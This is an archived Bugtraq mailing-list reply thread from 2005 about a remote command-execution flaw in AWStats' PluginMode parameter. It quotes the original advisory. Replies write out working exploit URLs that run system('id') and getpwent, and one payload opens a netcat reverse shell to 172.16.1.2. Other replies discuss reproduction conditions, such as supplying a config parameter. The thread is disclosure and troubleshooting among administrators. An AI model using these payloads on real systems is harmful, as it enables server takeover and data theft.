Bugtraq mailing list archives
Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3?
From: twebster () daksoft com
Date: Tue, 15 Feb 2005 14:00:55 -0700
You may need to specify an awstats config to view example: http://www.site.org/awstats/cgi-bin/awstats.pl?config=websitename&PluginMode=:print+system('id')+ ; Tony Jamie Pratt <jpratt () norwich edu> wrote on 02/15/2005 12:25:43 PM:
So what are the conditions of this bug/vuln? I can't reproduce this on several 6.3 installs..: awstats 6.3 from source: request: http://www.site.org/awstats/cgi-bin/awstats.pl?&PluginMode=: print+system('id')+; output: **************** Error: Can't locate object method "BuildFullHTMLOutput_print" via package "systemid" (perhaps you forgot to load "systemid"?) at (eval 1) line 1. Setup ('/etc/awstats/awstats.www.site.org.conf' file, web server or permissions) may be wrong. Check config file, permissions and AWStats documentation (in 'docs' directory). *************** regards, jamie Ondra Holecek wrote:GHC () www securityfocus com wrote: | | /*==========================================*/ | // GHC -> AWStats <- ADVISORY | \\ PRODUCT: AWStats | // VERSION: <= 6.3 | \\ URL: http://awstats.sourceforge.net/ | // VULNERABILITY CLASS: Multiple vulnerabilities | \\ RISK: high | /*==========================================*/ [...] | | PluginMode=:print+getpwent | | And the $function becomes 'BuildFullHTMLOutput_:print getpwent()'. | This will satisfy eval() requirements., and :print getpwent() is executed. | | http://www.lan.server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent| | Sanitazing limits user's input, but there is no filtration for call sympols '()'. no, user is not limited, he can execute ANY command if he add ; at the end of the command, try this awstats.pl?&PluginMode=:print+system('id')+; or even this awstats.pl?&PluginMode=:print+system('nc+172.16.1.2+3000+-e+/bin/sh')+; Ondra-- James Pratt Unix Systems Administrator Norwich University http://www.norwich.edu/it <jpratt () norwich edu> | ph. (802)485-2532
Current thread:
- AWStats <= 6.4 Multiple vulnerabilities GHC (Feb 14)
- Re: AWStats <= 6.4 Multiple vulnerabilities Ondra Holecek (Feb 15)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? Jamie Pratt (Feb 15)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? Ondra Holecek (Feb 15)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? Herman Sheremetyev (Feb 15)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? Jamie Pratt (Feb 15)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? Thom Craver (Feb 16)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? Micah Brandon (Feb 16)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? Matt Wilder (Feb 17)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? Jamie Pratt (Feb 15)
- Re: AWStats <= 6.4 Multiple vulnerabilities Ondra Holecek (Feb 15)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? Ondra Holecek (Feb 15)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? twebster (Feb 15)